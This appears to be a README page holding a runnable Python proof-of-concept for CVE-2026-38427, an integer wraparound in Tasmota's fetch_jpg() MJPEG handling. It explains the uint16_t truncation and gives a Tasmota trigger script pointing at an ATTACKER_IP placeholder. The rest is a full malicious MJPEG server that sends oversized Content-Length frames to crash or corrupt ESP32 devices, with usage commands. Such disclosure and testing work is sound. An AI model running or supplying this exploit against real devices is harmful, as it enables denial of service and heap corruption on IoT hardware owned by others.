README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: CVE-2026-38427
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg() case 2
Vulnerability:
Content-Length from MJPEG frame stored in uint16_t:
char inbuff[64];
stream.readBytesUntil('\n', inbuff, sizeof(inbuff)); // "Content-Length: 70000"
char *cp = strchr(inbuff, ':');
uint16_t size = 0;
if (cp) {
size = atoi(cp + 1); // atoi("70000") = 70000 (int)
// IMPLICIT TRUNCATION: uint16_t size = 70000 → 4464 (70000 % 65536)
}
uint8_t *buff = (uint8_t *)special_malloc(size); // malloc(4464)
if (buff) {
stream.readBytes(buff, size); // reads 4464 bytes
}
// Stream still has 65536 unread bytes → heap/stream corruption
Integer Wraparound:
value → uint16_t result
65536 → 0 (if(size>0) skipped entirely)
65537 → 1 (malloc 1 byte)
70000 → 4464 (malloc 4464, but JPEG is 70000 bytes)
131072 → 0 (malloc 0 / skipped)
Impact:
- Heap corruption via stream state mismatch
- malloc(0) or malloc(1) with large data pending → crash
- On ESP32: special_malloc(0) may return non-NULL → heap corruption
Tasmota script to trigger:
>D
>B
fetchjp(ATTACKER_IP:8889/stream,0,0,1)
>1
=fetchjp(2,0,0,1) ; get next frame (triggers case 2)
Usage:
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072
Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38427
"""
import socket
import argparse
import time
import os
from datetime import datetime
# Banner text that main() prints to stdout; it names the CVE and the
# affected firmware versions.
BANNER = """
╔══════════════════════════════════════════════════════╗
║ CVE-2026-38427 PoC — Tasmota fetch_jpg() ║
║ uint16_t Integer Wraparound → Heap Overflow ║
║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║
╚══════════════════════════════════════════════════════╝
"""
def log(msg, level="*"):
    """Print ``msg`` to stdout, prefixed with the local time and a level tag.

    Args:
        msg: Text to display.
        level: Short marker shown in square brackets after the timestamp.
    """
    stamp = f"{datetime.now():%H:%M:%S}"
    prefix = f"[{stamp}] [{level}]"
    print(f"{prefix} {msg}")
def uint16_wrap(value):
    """Return the low 16 bits of ``value``, as a C ``uint16_t`` would hold it."""
    low_16_bits = (1 << 16) - 1
    return value & low_16_bits
def make_mjpeg_frame(content_length_header, actual_data_size, fill_byte=b'\xff'):
    """Build a single multipart MJPEG part.

    The part consists of the ``--myboundary`` line, a ``Content-Type`` and a
    ``Content-Length`` header, a blank line, a JPEG-like payload and a
    trailing CRLF.

    Args:
        content_length_header: Value written verbatim into the
            ``Content-Length`` header. It is independent of the payload size.
        actual_data_size: Number of payload bytes placed after the headers.
        fill_byte: Byte repeated between the JFIF header and the EOI marker.

    Returns:
        The encoded frame as ``bytes``.

    Raises:
        ValueError: If ``actual_data_size`` is negative.
    """
    if actual_data_size < 0:
        raise ValueError("actual_data_size must be non-negative")

    # Fake minimal JPEG: SOI + APP0/JFIF header (20 bytes) ... EOI marker.
    jfif_header = (
        b'\xff\xd8\xff\xe0'        # SOI + APP0 marker
        b'\x00\x10JFIF\x00'        # JFIF header
        b'\x01\x01\x00\x00\x01'
        b'\x00\x01\x00\x00'
    )
    eoi_marker = b'\xff\xd9'

    # Reserve room for the EOI marker so that it survives the final slice;
    # sizing the padding from the header alone would push the marker past
    # actual_data_size and cut it off.
    pad_len = max(0, actual_data_size - len(jfif_header) - len(eoi_marker))
    padding = (fill_byte * pad_len)[:pad_len]

    # The slice only shortens the payload when the requested size is smaller
    # than header + EOI.
    jpeg_data = (jfif_header + padding + eoi_marker)[:actual_data_size]

    part_headers = (
        f"--myboundary\r\n"
        f"Content-Type: image/jpeg\r\n"
        f"Content-Length: {content_length_header}\r\n"
        f"\r\n"
    ).encode()
    return part_headers + jpeg_data + b"\r\n"
def handle_client(conn, addr, content_length, frames):
    """Serve one connected client, then close the connection.

    Reads the client's request, answers with a multipart MJPEG response
    header, and then sends ``frames`` identical parts whose ``Content-Length``
    header and payload size are both ``content_length``. Progress is reported
    through ``log``; errors are logged rather than raised.

    Args:
        conn: Connected socket for this client. It is always closed on return.
        addr: ``(host, port)`` pair of the peer, used only for logging.
        content_length: Content-Length value to advertise and payload size
            to send for each frame.
        frames: Number of frames to send.
    """
    log(f"Tasmota connected: {addr[0]}:{addr[1]}", "+")
    try:
        # Receive initial HTTP request
        request = conn.recv(2048).decode('utf-8', errors='ignore')
        log(f"Request: {request.splitlines()[0] if request else 'empty'}")

        # Step 1: Send initial HTTP 200 response (fetch_jpg case 0)
        actual_cl = uint16_wrap(content_length)
        log(f"Content-Length in header: {content_length}")
        log(f"uint16_t truncated value: {actual_cl} ({content_length} & 0xFFFF)")
        log(f"Buffer allocated on ESP32: {actual_cl} bytes")
        log(f"Actual data in stream: {content_length} bytes")
        log(f"Unread bytes after readBytes(): {content_length - actual_cl}", "!")

        init_response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Type: multipart/x-mixed-replace; boundary=myboundary\r\n"
            "Connection: keep-alive\r\n"
            "\r\n"
        ).encode()
        # sendall() keeps writing until the whole buffer is out; send() may
        # stop after a partial write and would silently drop the remainder.
        conn.sendall(init_response)
        log("Initial HTTP response sent (case 0 complete)")
        time.sleep(0.5)

        # Step 2: Send MJPEG frames (case 2). Every frame is identical, so it
        # is built once outside the loop.
        frame = make_mjpeg_frame(
            content_length_header=content_length,
            actual_data_size=content_length
        )
        for i in range(frames):
            log(f"Sending frame {i+1}/{frames} with Content-Length: {content_length}", "!")
            conn.sendall(frame)
            log(f" Header says: {content_length} bytes")
            log(f" ESP32 reads: {actual_cl} bytes (uint16_t wrap)")
            log(f" Remaining in stream: {content_length - actual_cl} bytes (CORRUPTION!)", "!")
            time.sleep(0.3)

        log("All frames sent — ESP32 should crash/reboot now", "!")
        time.sleep(2)
    except (BrokenPipeError, ConnectionResetError):
        # A peer that goes away mid-transfer can surface as either error.
        log("ESP32 disconnected (likely crashed!)", "+")
    except Exception as e:
        # Boundary handler: report and fall through so the accept loop in the
        # caller keeps running.
        log(f"Error: {e}", "-")
    finally:
        conn.close()
def main():
    """Parse command-line options, print a summary, and serve clients.

    Options: ``--ip`` and ``--port`` select the listening address, ``--cl``
    is the Content-Length value passed to ``handle_client``, and ``--frames``
    is the number of frames sent per connection. Clients are handled one at
    a time until the process receives Ctrl-C.
    """
    print(BANNER)
    parser = argparse.ArgumentParser(description="CVE-2026-38427 PoC Server")
    parser.add_argument("--ip", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8889)
    parser.add_argument("--cl", type=int, default=65537,
                        help="Malicious Content-Length (>65535)")
    parser.add_argument("--frames", type=int, default=3,
                        help="Number of frames to send")
    args = parser.parse_args()

    # Values that fit in 16 bits do not wrap; warn but continue anyway.
    if args.cl <= 65535:
        log(f"WARNING: Content-Length {args.cl} <= 65535, no wraparound!", "-")
        log("Use --cl 65537 or higher for wraparound", "-")

    log("CVE-2026-38427 — uint16_t Integer Wraparound PoC", "+")
    log(f"Listening: {args.ip}:{args.port}")
    log(f"Content-Length: {args.cl} → wraps to {uint16_wrap(args.cl)}")
    log("─" * 54)
    log("Wraparound table:")
    for cl in [65536, 65537, 65600, 70000, 131072, 131073]:
        wrapped = uint16_wrap(cl)
        log(f" {cl:>7} → {wrapped:>5} (corrupts {cl-wrapped} bytes in stream)")
    log("─" * 54)
    log("Tasmota script:")
    log(" >D")
    log(" >B")
    log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
    log(" >1")
    log(" =fetchjp(2,0,0,1)")
    log("─" * 54)

    # The with-block closes the listening socket on every exit path,
    # including a failed bind() or listen().
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((args.ip, args.port))
        server.listen(5)
        log("Waiting for Tasmota device...", "*")
        try:
            while True:
                conn, addr = server.accept()
                handle_client(conn, addr, args.cl, args.frames)
        except KeyboardInterrupt:
            log("Stopped")
# Start the server only when this file is executed as a script, not when it
# is imported as a module.
if __name__ == "__main__":
    main()